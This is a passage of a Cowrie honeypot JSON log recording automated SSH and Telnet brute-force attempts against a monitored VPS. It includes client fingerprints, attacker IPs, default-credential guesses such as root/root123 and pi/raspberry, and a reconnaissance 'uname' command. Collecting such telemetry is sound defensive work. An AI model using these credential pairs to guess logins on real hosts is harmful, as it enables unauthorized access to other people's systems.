es192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:21:15.333476Z","src_ip":"83.168.105.65","session":"f6ca0bd9b1c4"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w3e4r","message":"login attempt [root/!Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:21:15.522909Z","src_ip":"83.168.105.65","session":"f6ca0bd9b1c4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:21:15.653008Z","src_ip":"83.168.105.65","session":"f6ca0bd9b1c4"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:21:15.653677Z","src_ip":"83.168.105.65","session":"f6ca0bd9b1c4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:21:15.692044Z","src_ip":"83.168.105.65","session":"f6ca0bd9b1c4"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:21:15.693251Z","src_ip":"83.168.105.65","session":"f6ca0bd9b1c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46016,"dst_ip":"1.2.3.4","dst_port":22,"session":"e12a75a5bc5d","protocol":"ssh","message":"New connection: 212.227.125.160:46016 (1.2.3.4:22) [session: e12a75a5bc5d]","sensor":"my-vps","timestamp":"2025-08-26T11:21:17.739019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:21:17.743652Z","src_ip":"212.227.125.160","session":"e12a75a5bc5d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:21:17.806284Z","src_ip":"212.227.125.160","session":"e12a75a5bc5d"}
{"eventid":"cowrie.login.failed","username":"alisson","password":"alisson","message":"login attempt [alisson/alisson] failed","sensor":"my-vps","timestamp":"2025-08-26T11:21:17.992505Z","src_ip":"212.227.125.160","session":"e12a75a5bc5d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:21:19.045595Z","src_ip":"212.227.125.160","session":"e12a75a5bc5d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46782,"dst_ip":"1.2.3.4","dst_port":22,"session":"3897de0f6a22","protocol":"ssh","message":"New connection: 212.227.125.160:46782 (1.2.3.4:22) [session: 3897de0f6a22]","sensor":"my-vps","timestamp":"2025-08-26T11:21:23.454556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:21:23.455265Z","src_ip":"212.227.125.160","session":"3897de0f6a22"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:21:23.507630Z","src_ip":"212.227.125.160","session":"3897de0f6a22"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:21:23.699404Z","src_ip":"212.227.125.160","session":"3897de0f6a22"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:21:24.113880Z","src_ip":"212.227.125.160","session":"3897de0f6a22"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:21:24.114608Z","src_ip":"212.227.125.160","session":"3897de0f6a22"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:21:24.214051Z","src_ip":"212.227.125.160","session":"3897de0f6a22"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:21:24.215219Z","src_ip":"212.227.125.160","session":"3897de0f6a22"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47546,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a91d9e3b390","protocol":"ssh","message":"New connection: 212.227.125.160:47546 (1.2.3.4:22) [session: 4a91d9e3b390]","sensor":"my-vps","timestamp":"2025-08-26T11:21:29.526360Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:21:29.545541Z","src_ip":"212.227.125.160","session":"4a91d9e3b390"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:21:29.624809Z","src_ip":"212.227.125.160","session":"4a91d9e3b390"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":56624,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e1105792b93","protocol":"ssh","message":"New connection: 83.168.105.65:56624 (1.2.3.4:22) [session: 6e1105792b93]","sensor":"my-vps","timestamp":"2025-08-26T11:21:29.967683Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:21:30.023567Z","src_ip":"83.168.105.65","session":"6e1105792b93"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:21:30.024302Z","src_ip":"83.168.105.65","session":"6e1105792b93"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink","message":"login attempt [flink/flink] failed","sensor":"my-vps","timestamp":"2025-08-26T11:21:30.122959Z","src_ip":"212.227.125.160","session":"4a91d9e3b390"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-26T11:21:30.168645Z","src_ip":"83.168.105.65","session":"6e1105792b93"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:21:31.206455Z","src_ip":"83.168.105.65","session":"6e1105792b93"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:21:31.258008Z","src_ip":"212.227.125.160","session":"4a91d9e3b390"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48314,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a6bd818a985","protocol":"ssh","message":"New connection: 212.227.125.160:48314 (1.2.3.4:22) [session: 9a6bd818a985]","sensor":"my-vps","timestamp":"2025-08-26T11:21:35.751026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:21:35.752006Z","src_ip":"212.227.125.160","session":"9a6bd818a985"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:21:35.861108Z","src_ip":"212.227.125.160","session":"9a6bd818a985"}
{"eventid":"cowrie.login.failed","username":"mehdi","password":"123456","message":"login attempt [mehdi/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:21:36.358397Z","src_ip":"212.227.125.160","session":"9a6bd818a985"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:21:37.618101Z","src_ip":"212.227.125.160","session":"9a6bd818a985"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":33270,"dst_ip":"1.2.3.4","dst_port":22,"session":"0315766ca865","protocol":"ssh","message":"New connection: 196.251.86.249:33270 (1.2.3.4:22) [session: 0315766ca865]","sensor":"my-vps","timestamp":"2025-08-26T11:21:38.583466Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:21:39.084640Z","src_ip":"196.251.86.249","session":"0315766ca865"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:21:39.085279Z","src_ip":"196.251.86.249","session":"0315766ca865"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"qwer1234","message":"login attempt [hadoop/qwer1234] failed","sensor":"my-vps","timestamp":"2025-08-26T11:21:40.761493Z","src_ip":"196.251.86.249","session":"0315766ca865"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49080,"dst_ip":"1.2.3.4","dst_port":22,"session":"aba6ce65ae4c","protocol":"ssh","message":"New connection: 212.227.125.160:49080 (1.2.3.4:22) [session: aba6ce65ae4c]","sensor":"my-vps","timestamp":"2025-08-26T11:21:41.610090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:21:41.611069Z","src_ip":"212.227.125.160","session":"aba6ce65ae4c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:21:41.660059Z","src_ip":"212.227.125.160","session":"aba6ce65ae4c"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker123","message":"login attempt [docker/docker123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:21:41.809667Z","src_ip":"212.227.125.160","session":"aba6ce65ae4c"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:21:42.603282Z","src_ip":"196.251.86.249","session":"0315766ca865"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:21:42.860732Z","src_ip":"212.227.125.160","session":"aba6ce65ae4c"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41102,"dst_ip":"1.2.3.4","dst_port":22,"session":"4416ea84901a","protocol":"ssh","message":"New connection: 83.168.105.65:41102 (1.2.3.4:22) [session: 4416ea84901a]","sensor":"my-vps","timestamp":"2025-08-26T11:21:44.742090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:21:44.742767Z","src_ip":"83.168.105.65","session":"4416ea84901a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:21:44.778550Z","src_ip":"83.168.105.65","session":"4416ea84901a"}
{"eventid":"cowrie.login.failed","username":"hive","password":"hive","message":"login attempt [hive/hive] failed","sensor":"my-vps","timestamp":"2025-08-26T11:21:44.887938Z","src_ip":"83.168.105.65","session":"4416ea84901a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58305,"dst_ip":"1.2.3.4","dst_port":23,"session":"c3e59347708f","protocol":"telnet","message":"New connection: 212.227.125.160:58305 (1.2.3.4:23) [session: c3e59347708f]","sensor":"my-vps","timestamp":"2025-08-26T11:21:44.927238Z"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:21:45.925670Z","src_ip":"83.168.105.65","session":"4416ea84901a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49854,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9cf1d1a3863","protocol":"ssh","message":"New connection: 212.227.125.160:49854 (1.2.3.4:22) [session: c9cf1d1a3863]","sensor":"my-vps","timestamp":"2025-08-26T11:21:47.099234Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:21:47.100120Z","src_ip":"212.227.125.160","session":"c9cf1d1a3863"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:21:47.149362Z","src_ip":"212.227.125.160","session":"c9cf1d1a3863"}
